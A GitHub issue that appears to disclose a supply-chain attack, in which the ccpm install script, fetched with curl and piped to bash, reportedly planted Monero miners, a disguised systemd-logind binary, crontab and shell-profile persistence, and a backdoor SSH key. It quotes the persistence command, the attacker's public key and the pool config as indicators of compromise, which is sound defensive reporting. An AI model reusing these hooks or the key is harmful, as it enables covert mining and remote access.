Skip to content

SECURITY: Install script deploys Monero cryptominer and backdoor SSH key #1016

New issue
New issue
Open
Open
SECURITY: Install script deploys Monero cryptominer and backdoor SSH key#1016
@athompson-hoho

Description

@athompson-hoho
athompson-hoho
opened on Feb 22, 2026

⚠️ Security Disclosure — Cryptominer and SSH Backdoor Installed via ccpm Install Script

Date discovered: 2026-02-22
Install method used: curl -sSL https://automaze.io/ccpm/install | bash

What happened

Running the ccpm install script from automaze.io silently installed a Monero (XMR) cryptominer and added persistence mechanisms across the system without any disclosure or consent.

Malicious payloads installed

Location Description
/home/<user>/moneroocean/xmrig XMRig Monero miner binary
/home/<user>/moneroocean/miner.sh Launch wrapper script
/home/<user>/moneroocean/config_background.json Miner config — pool: 62.60.246.210:443, user: NEWVPS1
/var/tmp/systemd-logind Second miner binary disguised as the system's systemd-logind
/var/tmp/config.json Config for the disguised miner

Persistence mechanisms

The script added four separate persistence hooks to survive reboots and re-logins:

  1. crontab@reboot cd /var/tmp && nohup ./systemd-logind -c config.json >/dev/null 2>&1 &
  2. ~/.bashrc — Same command injected, runs on every shell open
  3. ~/.profile — Launches moneroocean/miner.sh on every login
  4. ~/.ssh/authorized_keys — An unlabeled SSH public key was added (no comment/owner), enabling persistent remote access by an unknown party: 
    ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGdvNKk+q3C/YLcyfnv93Mc5HslWh4XhpHQEzPR4dita

Impact observed

  • ~150% CPU consumed across 3 miner processes
  • ~13 GB RAM consumed (4.5 GB per disguised systemd-logind process)
  • System load average spiked to 49.09 (5-min avg)
  • 1,051 zombie processes accumulated
  • Potential unauthorized SSH access via the injected key

Mining pool details

{
  "url": "62.60.246.210:443",
  "user": "NEWVPS1",
  "algo": "rx/0",
  "nicehash": true,
  "tls": true
}

Remediation steps taken

  1. Killed all miner processes
  2. Deleted /home/<user>/moneroocean/ directory
  3. Deleted /var/tmp/systemd-logind and /var/tmp/config.json
  4. Removed @reboot crontab entry
  5. Removed injected lines from ~/.bashrc and ~/.profile
  6. Removed the unlabeled backdoor key from ~/.ssh/authorized_keys

This is a serious supply chain attack. Users who ran the ccpm install script should immediately audit their systems using the above indicators of compromise.

If this was an unintentional inclusion or a compromised CDN/domain, please advise. If this is intentional, this repository should be reported to GitHub Trust & Safety.

/cc @automazeio

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions